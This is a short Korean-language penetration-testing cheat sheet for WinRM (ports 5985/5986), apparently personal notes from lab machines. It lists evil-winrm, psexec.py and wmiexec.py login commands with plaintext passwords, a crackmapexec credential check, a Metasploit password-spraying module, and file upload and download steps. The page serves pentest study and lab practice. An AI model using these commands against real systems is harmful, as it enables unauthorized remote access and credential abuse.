5985, 5986 - Winrm

// Winrm 원격접속
evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
psexec.py 'administrator:!R3m0te!@10.10.10.180'
wmiexec.py 'administrator:!R3m0te!@10.10.10.180'

// Winrm 접속되는지 테스트
crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

만약 smb 계정과 비밀번호를 얻었다면 winrm 접속시도를 한번은 해보는 것이 좋다

// Winrm 비밀번호 스프레이
msf5 auxiliary(scanner/winrm/winrm_login) run
[Set RHOST, RPORT, USERNAME, PASSWORD]

//파일 업로드
upload 업로드 할 파일use 

//파일 다운로드
download 파일 이름(/opt/evil-winrm에 다운받은 폴더 생성)

Previous4555 - James NextOracle TNS

Last updated 1 year ago